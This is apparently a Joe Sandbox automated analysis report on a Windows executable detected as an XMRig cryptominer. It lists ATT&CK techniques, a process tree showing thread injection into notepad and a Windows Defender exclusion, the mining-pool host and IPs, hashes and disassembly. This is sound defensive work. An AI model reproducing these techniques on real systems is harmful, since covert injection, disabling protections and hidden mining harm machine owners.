            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\notepad.exeCode function: 5_2_000000014031010C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,5_2_000000014031010C
            Source: C:\Windows\System32\notepad.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: notepad.exe, 00000005.00000002.2940501021.0000029C16C9A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: procexp.exe
MITRE ATT&CK Matrix (techniques listed per tactic; the count shown in the report for a technique is given in parentheses)

• Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
• Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
• Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
• Execution: Windows Management Instrumentation (1); Command and Scripting Interpreter (12); At; Cron; Launchd; Scheduled Task
• Persistence: Windows Service (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
• Privilege Escalation: Windows Service (1); Process Injection (611); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1); Network Logon Script; RC Scripts
• Defense Evasion: Masquerading (1); Disable or Modify Tools (1); Virtualization/Sandbox Evasion (121); Process Injection (611); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1)
• Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
• Discovery: System Time Discovery (1); Security Software Discovery (211); Process Discovery (1); Virtualization/Sandbox Evasion (121); Application Window Discovery (1); System Information Discovery (14)
• Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
• Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
• Command and Control: Encrypted Channel (2); Non-Application Layer Protocol (1); Application Layer Protocol (2); Protocol Impersonation; Fallback Channels; Multiband Communication
• Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
• Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Behavior Graph ID: 1589435 | Sample: 9d2h99wrj.exe | Start date: 12/01/2025 | Architecture: WINDOWS | Score: 100
DNS/IP: pool.hashvault.pro
Sample-level signatures: Sigma detected: Xmrig; Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; 6 other signatures

Process tree:
• 9d2h99wrj.exe (started)
  Signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Creates a thread in another existing process (thread injection); Found direct / indirect Syscall (likely to bypass EDR)
  • conhost.exe (5) (started)
    Dropped file: C:\Users\user\AppData\Roaming\...\WR64.sys, PE32+
    Signatures: Found strings related to Crypto-Mining; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Writes to foreign memory regions; 4 other signatures
    • notepad.exe (started)
      Network: 80.240.16.67, 443, 49730, 49733 AS-CHOOPAUS Germany; pool.hashvault.pro 192.248.189.11, 443, 49731, 49741 AS-CHOOPAUS France
      Signatures: System process connects to network (likely due to code injection or exploit); Query firmware table information (likely to detect VMs); Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
    • cmd.exe (1) (started)
      Signatures: Adds a directory exclusion to Windows Defender
      • powershell.exe (23) (started)
        Signatures: Loading BitLocker PowerShell Module
      • powershell.exe (23) (started)
      • conhost.exe (started)

Source | Detection | Scanner | Label
9d2h99wrj.exe | 60% | Virustotal |
9d2h99wrj.exe | 61% | ReversingLabs | Win64.Trojan.Donut
9d2h99wrj.exe | 100% | Avira | HEUR/AGEN.1344832
9d2h99wrj.exe | 100% | Joe Sandbox ML |
Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys | 5% | ReversingLabs |
C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys | 4% | Virustotal |
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches


Name | IP | Active | Malicious | Antivirus Detection | Reputation
pool.hashvault.pro | 192.248.189.11 | true | false | | high

Name | Source | Malicious | Antivirus Detection | Reputation
https://xmrig.com/benchmark/%s
  Source: conhost.exe, 00000001.00000003.1727491155.00000211D0BCD000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1724397505.00000211D0BCF000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1722733645.00000211D0BCA000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1718862129.00000211D0BC2000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1719595132.00000211D0BC6000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1723937432.00000211D0BC7000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1729241507.00000211D0BC0000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1717134886.00000211D0BCC000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1726405894.00000211D0BCE000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1734910093.00000211D0BC5000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000005.00000002.2939901627.0000000140000000.00000040.00000400.00020000.00000000.sdmp
  Malicious: false | Reputation: high
https://xmrig.com/wizard
  Source: conhost.exe, 00000001.00000003.1727491155.00000211D0BCD000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1724397505.00000211D0BCF000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1722733645.00000211D0BCA000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1718862129.00000211D0BC2000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1719595132.00000211D0BC6000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1723937432.00000211D0BC7000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1729241507.00000211D0BC0000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1717134886.00000211D0BCC000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1726405894.00000211D0BCE000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1734910093.00000211D0BC5000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000005.00000002.2939901627.0000000140000000.00000040.00000400.00020000.00000000.sdmp
  Malicious: false | Reputation: high
https://xmrig.com/wizard%s
  Source: conhost.exe, 00000001.00000003.1727491155.00000211D0BCD000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1724397505.00000211D0BCF000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1722733645.00000211D0BCA000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1718862129.00000211D0BC2000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1719595132.00000211D0BC6000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1723937432.00000211D0BC7000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1729241507.00000211D0BC0000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1717134886.00000211D0BCC000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1726405894.00000211D0BCE000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1734910093.00000211D0BC5000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000005.00000002.2939901627.0000000140000000.00000040.00000400.00020000.00000000.sdmp
  Malicious: false | Reputation: high
https://xmrig.com/docs/algorithms
  Source: conhost.exe, 00000001.00000003.1727491155.00000211D0BCD000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1724397505.00000211D0BCF000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1722733645.00000211D0BCA000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1718862129.00000211D0BC2000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1719595132.00000211D0BC6000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1723937432.00000211D0BC7000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1729241507.00000211D0BC0000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1717134886.00000211D0BCC000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1726405894.00000211D0BCE000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1734910093.00000211D0BC5000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000005.00000002.2939901627.0000000140000000.00000040.00000400.00020000.00000000.sdmp
  Malicious: false | Reputation: high
IP | Domain | Country | ASN | ASN Name | Malicious
80.240.16.67 | unknown | Germany | 20473 | AS-CHOOPAUS | true
192.248.189.11 | pool.hashvault.pro | France | 20473 | AS-CHOOPAUS | false
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1589435
Start date and time: 2025-01-12 14:18:09 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 7s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 12
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 9d2h99wrj.exe
Detection: MAL
Classification: mal100.evad.mine.winEXE@12/11@2/2
EGA Information:
• Successful, ratio: 50%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
• Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.45
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target notepad.exe, PID 7112 because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtCreateKey calls found.

Time | Type | Description
08:19:02 | API Interceptor | 1x Sleep call for process: 9d2h99wrj.exe modified
08:19:05 | API Interceptor | 33x Sleep call for process: powershell.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name
80.240.16.67 | Solara.exe | malicious | Python Stealer, Exela Stealer, Xmrig
80.240.16.67 | xmr new.exe | malicious | Xmrig
192.248.189.11 | file.exe | malicious | LummaC, Amadey, LummaC Stealer, XWorm, Xmrig
192.248.189.11 | eth.exe | malicious | Xmrig
Match | Associated Sample Name / URL | Detection | Threat Name | Context
pool.hashvault.pro | Solara.exe | malicious | Python Stealer, Exela Stealer, Xmrig | 192.248.189.11
pool.hashvault.pro | xmr new.exe | malicious | Xmrig | 80.240.16.67
pool.hashvault.pro | eth.exe | malicious | Xmrig | 192.248.189.11
pool.hashvault.pro | ZppxPm0ASs.exe | malicious | Xmrig | 5.188.137.200
pool.hashvault.pro | file.exe | malicious | Amadey, LummaC Stealer, Vidar, Xmrig | 5.188.137.200
pool.hashvault.pro | file.exe | malicious | Amadey, LummaC Stealer, Stealc, Vidar, Xmrig | 37.203.243.102
pool.hashvault.pro | file.exe | malicious | Xmrig | 5.188.137.200
pool.hashvault.pro | file.exe | malicious | Amadey, LummaC Stealer, Stealc, Vidar, Xmrig | 5.188.137.200
pool.hashvault.pro | file.exe | malicious | Xmrig | 37.203.243.102
pool.hashvault.pro | file.exe | malicious | DarkVision Rat, Xmrig | 37.203.243.102
Match | Associated Sample Name / URL | Detection | Threat Name | Context
AS-CHOOPAUS | Solara.exe | malicious | Python Stealer, Exela Stealer, Xmrig | 80.240.16.67
AS-CHOOPAUS | 80P.exe | malicious | I2PRAT | 207.246.88.73
AS-CHOOPAUS | 4.elf | malicious | Unknown | 44.40.164.148
AS-CHOOPAUS | zE1VxVoZ3W.exe | malicious | FormBook | 78.141.202.204
AS-CHOOPAUS | Fantazy.mpsl.elf | malicious | Unknown | 44.40.164.150
AS-CHOOPAUS | file.exe | malicious | LummaC, Amadey, LummaC Stealer, XWorm, Xmrig | 192.248.189.11
AS-CHOOPAUS | miori.x86.elf | malicious | Unknown | 44.175.18.157
AS-CHOOPAUS | xmr new.exe | malicious | Xmrig | 80.240.16.67
AS-CHOOPAUS | eth.exe | malicious | Xmrig | 192.248.189.11
AS-CHOOPAUS | cZO.exe | malicious | Unknown | 108.61.189.74
                              No context
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys | Solara.exe | malicious | Python Stealer, Exela Stealer, Xmrig
C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys | launcher.exe.bin.exe | malicious | PureLog Stealer, Xmrig, zgRAT
C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys | nW2oopMIdg.exe | malicious | Xmrig
C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys | gem2.exe | malicious | Xmrig
C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys | chrtrome22.exe | malicious | Xmrig
C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys | pTVKHqys2h.exe | malicious | Xmrig
C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys | 174.exe | malicious | Xmrig
C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys | file.exe | malicious | LummaC, Amadey, LummaC Stealer, XWorm, Xmrig
C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys | 47SXvEQ.exe | malicious | Blank Grabber, Xmrig
C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys | xmr new.exe | malicious | Xmrig
                                                  Process:C:\Windows\System32\conhost.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1267
                                                  Entropy (8bit):5.355115896011818
                                                  Encrypted:false
                                                  SSDEEP:24:ML9E4KQMsXE4Np/E4K9E4KnKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQrHNp/HK9HKnYHKGSI6oPtHTHhA2
                                                  MD5:5B8589D00296CA4291880EAC82B43B1D
                                                  SHA1:6C11FD4FCD6B9B3762F048BBF45EE0516BF668B3
                                                  SHA-256:F207A0EAD4836653A8CCA1C28C08BB0772EAB1743E7E8136064C31CC3883DD99
                                                  SHA-512:A938DDC717A9EF0FCBC4C69813CA409F0E67FF996854A61ED0C2D41FFD06386936A564669C6D50921A2088FC814CE94CA74AF91F0644E5678852BF50E9280BF8
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\8af759007c012da690062882e06694f1\System.Management.ni.dll",0..2,"System.IO.Compression, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.IO.Compression.FileSystem, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configur
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):64
                                                  Entropy (8bit):0.34726597513537405
                                                  Encrypted:false
                                                  SSDEEP:3:Nlll:Nll
                                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                  Malicious:false
                                                  Reputation:high, very likely benign file
                                                  Preview:@...e...........................................................
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\conhost.exe
                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):14544
                                                  Entropy (8bit):6.2660301556221185
                                                  Encrypted:false
                                                  SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                  MD5:0C0195C48B6B8582FA6F6373032118DA
                                                  SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                  SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                  SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 5%
                                                   • Antivirus: Virustotal, Detection: 4%
                                                   Joe Sandbox View:
                                                   • Filename: Solara.exe, Detection: malicious
                                                   • Filename: launcher.exe.bin.exe, Detection: malicious
                                                   • Filename: nW2oopMIdg.exe, Detection: malicious
                                                   • Filename: gem2.exe, Detection: malicious
                                                   • Filename: chrtrome22.exe, Detection: malicious
                                                   • Filename: pTVKHqys2h.exe, Detection: malicious
                                                   • Filename: 174.exe, Detection: malicious
                                                   • Filename: file.exe, Detection: malicious
                                                   • Filename: 47SXvEQ.exe, Detection: malicious
                                                   • Filename: xmr new.exe, Detection: malicious
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................
                                                  File type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                  Entropy (8bit):7.999991889029266
                                                  TrID:
                                                  • Win64 Executable (generic) (12005/4) 74.95%
                                                  • Generic Win/DOS Executable (2004/3) 12.51%
                                                  • DOS Executable Generic (2002/1) 12.50%
                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
                                                  File name:9d2h99wrj.exe
                                                  File size:31'161'344 bytes
                                                  MD5:88848246ce109235a762fcd193210caa
                                                  SHA1:9bbe1f1ef018b4cf4f9b4df15bd0904ab4f2ff5e
                                                  SHA256:ae9bec259aef6380ed576361d588180e1850742708c24e60dc92fe07d0fb90c9
                                                  SHA512:3a4f5a41631b40bed2224cb4bdffaebd83cf40a8afa775623ecfa019928a1dfcdc749b4dc050dc6dfb54798add3e3d65424383cb37f422df5f79b492891cd999
                                                  SSDEEP:786432:YWC/VCO2W2JqrlTY25R6DTrqBDfIRwwoSPDitdV2jFj3qW3yq:BaVCO12YM25RyeTIRuN2R5i
                                                  TLSH:FF6733D123DD1175EF4671681E9B8DD6B4BE296CE89AE1C0BFD2131B260DE0E8504EBC
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................./..........b......."........@......................................,.....................................
                                                  Icon Hash:90cececece8e8eb0
                                                  Entrypoint:0x4022fa
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
                                                  DLL Characteristics:
                                                  Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:02549ff92b49cce693542fc9afb10102
                                                  Instruction
                                                  push ebp
                                                  dec eax
                                                  mov ebp, esp
                                                  dec eax
                                                  sub esp, 00000040h
                                                  dec eax
                                                  mov eax, 00000004h
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  dec ecx
                                                  mov eax, eax
                                                  mov eax, 00000000h
                                                  dec ecx
                                                  mov ebx, eax
                                                  dec eax
                                                  lea eax, dword ptr [ebp-04h]
                                                  dec ecx
                                                  mov edx, eax
                                                  dec esp
                                                  mov ecx, edx
                                                  dec esp
                                                  mov edx, ebx
                                                  call 00007F85D8BCBF21h
                                                  dec eax
                                                  lea eax, dword ptr [FFFFFF98h]
                                                  dec ecx
                                                  mov edx, eax
                                                  dec esp
                                                  mov ecx, edx
                                                  call 00007F85D8BCBF3Fh
                                                  mov eax, 00000001h
                                                  dec ecx
                                                  mov edx, eax
                                                  dec esp
                                                  mov ecx, edx
                                                  call 00007F85D8BCBF37h
                                                  mov eax, 00030000h
                                                  dec ecx
                                                  mov ebx, eax
                                                  mov eax, 00010000h
                                                  dec ecx
                                                  mov edx, eax
                                                  dec esp
                                                  mov ecx, edx
                                                  dec esp
                                                  mov edx, ebx
                                                  call 00007F85D8BCBF24h
                                                  dec eax
                                                  mov eax, dword ptr [01DB6824h]
                                                  dec eax
                                                  mov ecx, dword ptr [01DB6825h]
                                                  dec eax
                                                  mov edx, dword ptr [01DB6826h]
                                                  dec eax
                                                  mov dword ptr [ebp-10h], eax
                                                  dec eax
                                                  lea eax, dword ptr [ebp-04h]
                                                  dec eax
                                                  mov dword ptr [esp+20h], eax
                                                  mov eax, dword ptr [01DB7C17h]
                                                  dec ecx
                                                  mov ecx, eax
                                                  dec ecx
                                                  mov eax, edx
                                                  dec ecx
                                                  mov ebx, ecx
                                                  dec eax
                                                  mov eax, dword ptr [ebp-10h]
                                                  dec ecx
                                                  mov edx, eax
                                                  dec esp
                                                  mov ecx, edx
                                                  dec esp
                                                  mov edx, ebx
                                                  call 00007F85D8BCBEE9h
                                                  dec eax
                                                  mov eax, dword ptr [01DB67E1h]
                                                  dec eax
                                                  mov ecx, dword ptr [01DB67E2h]
                                                  dec eax
                                                  mov edx, dword ptr [01DB67E3h]
                                                   Name | Virtual Address | Virtual Size | Is in Section
                                                   IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
                                                   IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1db8b30 | 0x3c | .rdata
                                                   IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x1dbb000 | 0x1f0 | .rsrc
                                                   IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x1dba000 | 0x90 | .pdata
                                                   IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
                                                   IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | -
                                                   IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | -
                                                   IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
                                                   IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
                                                   IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
                                                   IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | -
                                                   IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
                                                   IMAGE_DIRECTORY_ENTRY_IAT | 0x1db8b6c | 0x90 | .rdata
                                                   IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
                                                   IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | -
                                                   IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
                                                   Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                   .text | 0x1000 | 0x14e0 | 0x1600 | 13853b963b201ea16f713421eaf302fb | False | 0.3283025568181818 | data | 5.435530746793809 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                   .rdata | 0x3000 | 0x1db5d6e | 0x1db5e00 | 5c5669048d44bdd74b60c56a40f08300 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                   .bss | 0x1db9000 | 0xfac | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                   .pdata | 0x1dba000 | 0x90 | 0x200 | 833d670d56c423f97067d7571a397b78 | False | 0.17578125 | data | 1.2087156271204966 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
